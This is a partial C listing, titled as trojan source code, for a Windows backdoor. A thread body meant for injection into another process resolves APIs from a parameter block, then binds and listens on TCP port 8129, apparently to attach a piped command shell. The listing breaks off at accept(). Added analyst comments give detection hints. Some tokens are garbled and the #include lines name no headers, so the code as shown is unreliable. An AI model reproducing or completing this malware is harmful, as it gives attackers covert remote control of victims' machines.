C语言编写的木马程序(源代码附上)


#include

#pragma comment(lib,"ws2_32.lib")

#include

#include

#pragma comment(lib,"Shlwapi.lib")

#include

#include

#include

//参数结构;

/*
 * RemotePara - parameter block consumed by ThreadProc.
 *
 * ThreadProc never calls an API by name: every entry point it uses is read
 * from this block and cast back to a function pointer. Together with the
 * "remote thread body" comment on ThreadProc, this suggests the block is
 * filled in by a loader and copied into another process alongside the thread
 * code -- the loader itself is not visible on this page, so treat that as an
 * assumption to confirm.
 *
 * Addresses are stored as DWORD values, in the order below; the layout must
 * match whatever code populates the block.
 *
 * Analyst note: the import set (Winsock listener calls plus CreatePipe /
 * CreateProcessA / PeekNamedPipe / ReadFile / WriteFile) is the usual shape
 * of a socket-attached, pipe-redirected child process. The visible part of
 * ThreadProc binds TCP port 8129 on INADDR_ANY, so an unexpected listener on
 * that port inside an otherwise unrelated process is a useful triage signal.
 */
typedef struct _RemotePara {
    /* Module loader entry points (cast to typed pointers in ThreadProc). */
    DWORD dwLoadLibrary;        /* called with winsockDll */
    DWORD dwFreeLibrary;
    DWORD dwGetProcAddress;
    DWORD dwGetModuleHandle;

    /* Winsock entry points; the visible ThreadProc code uses WSAStartup,
     * socket, htons, bind, listen and accept. */
    DWORD dwWSAStartup;
    DWORD dwSocket;
    DWORD dwhtons;
    DWORD dwbind;
    DWORD dwlisten;
    DWORD dwaccept;
    DWORD dwsend;               /* use not visible on this page */
    DWORD dwrecv;               /* use not visible on this page */
    DWORD dwclosesocket;        /* use not visible on this page */

    /* Process, pipe and handle entry points; ThreadProc loads them into
     * locals, but the calls fall outside the visible part of the listing. */
    DWORD dwCreateProcessA;
    DWORD dwPeekNamedPipe;
    DWORD dwWriteFile;
    DWORD dwReadFile;
    DWORD dwCloseHandle;
    DWORD dwCreatePipe;
    DWORD dwTerminateProcess;

    DWORD dwMessageBox;         /* assigned to PMessageBoxA in ThreadProc */

    /* Fixed-size string/data slots carried with the block. */
    char strMessageBox[12];     /* presumably message-box text -- confirm */
    char winsockDll[16];        /* library name passed to LoadLibrary */
    char cmd[10];               /* presumably the program to launch -- confirm */
    char Buff[4096];            /* presumably the socket/pipe relay buffer -- confirm */
    char telnetmsg[60];         /* presumably a banner sent to the peer -- confirm */
} RemotePara;

/*
 * EnablePrivilege - per the original comment, raises the application to
 * debug privilege. Judging by the parameter names it switches the privilege
 * szPrivName on or off (fEnable) for the token hToken; the definition is not
 * on this page, so confirm against the full source.
 *
 * Analyst note: a debug-privilege adjustment followed by a process lookup by
 * name and a remote-thread body is a sequence commonly seen in process
 * injection. Token right adjustments are recorded as Windows Security event
 * 4703 when that audit subcategory is enabled, and remote thread creation is
 * recorded as Sysmon event ID 8.
 */
BOOL EnablePrivilege(HANDLE hToken, LPCTSTR szPrivName, BOOL fEnable);

/*
 * GetPidByName - per the original comment, returns the process ID for the
 * process named szName. The definition is not on this page.
 */
DWORD GetPidByName(char *szName);

// 远程线程执行体

DWORD __stdcall ThreadProc(RemotePara *Para)

{

WSADATA WSAData;

WORD nVersion;

SOCKET listenSocket;

SOCKET clientSocket;

struct sockaddr_in server_addr;

struct sockaddr_in client_addr;

int iAddrSize = sizeof(client_addr);

SECURITY_ATTRIBUTES sa;

HANDLE hReadPipe1;

HANDLE hWritePipe1;

HANDLE hReadPipe2;

HANDLE hWritePipe2;

STARTUPINFO si;

PROCESS_INFORMA TION ProcessInformation;

unsigned long lBytesRead = 0;

typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);

typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR); typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE ); typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE);

FARPROC PMessageBoxA;

FARPROC PWSAStartup;

FARPROC PSocket;

FARPROC Phtons;

FARPROC Pbind;

FARPROC Plisten;

FARPROC Paccept;

FARPROC Psend;

FARPROC Precv;

FARPROC Pclosesocket;

FARPROC PCreateProcessA;

FARPROC PPeekNamedPipe;

FARPROC PWriteFile;

FARPROC PReadFile;

FARPROC PCloseHandle;

FARPROC PCreatePipe;

FARPROC PTerminateProcess;

PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary; PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para->dwGetProcAddress; PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary;

PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para->dwGetModuleHandle; LoadLibraryFunc(Para->winsockDll);

PWSAStartup = (FARPROC)Para->dwWSAStartup;

PSocket = (FARPROC)Para->dwSocket;

Phtons = (FARPROC)Para->dwhtons;

Pbind = (FARPROC)Para->dwbind;

Plisten = (FARPROC)Para->dwlisten;

Paccept = (FARPROC)Para->dwaccept;

Psend = (FARPROC)Para->dwsend;

Precv = (FARPROC)Para->dwrecv;

Pclosesocket = (FARPROC)Para->dwclosesocket;

PCreateProcessA = (FARPROC)Para->dwCreateProcessA;

PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe;

PWriteFile = (FARPROC)Para->dwWriteFile;

PReadFile = (FARPROC)Para->dwReadFile;

PCloseHandle = (FARPROC)Para->dwCloseHandle;

PCreatePipe = (FARPROC)Para->dwCreatePipe;

PTerminateProcess = (FARPROC)Para->dwTerminateProcess;

PMessageBoxA = (FARPROC)Para->dwMessageBox;

nVersion = MAKEWORD(2,1);

PWSAStartup(nVersion, (LPWSADATA)&WSAData);

listenSocket = PSocket(AF_INET, SOCK_STREAM, 0);

if(listenSocket == INV ALID_SOCKET)return 0;

server_addr.sin_family = AF_INET;

server_addr.sin_port = Phtons((unsigned short)(8129));

server_addr.sin_addr.s_addr = INADDR_ANY;

if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0; if(Plisten(listenSocket, 5))return 0;

clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize);
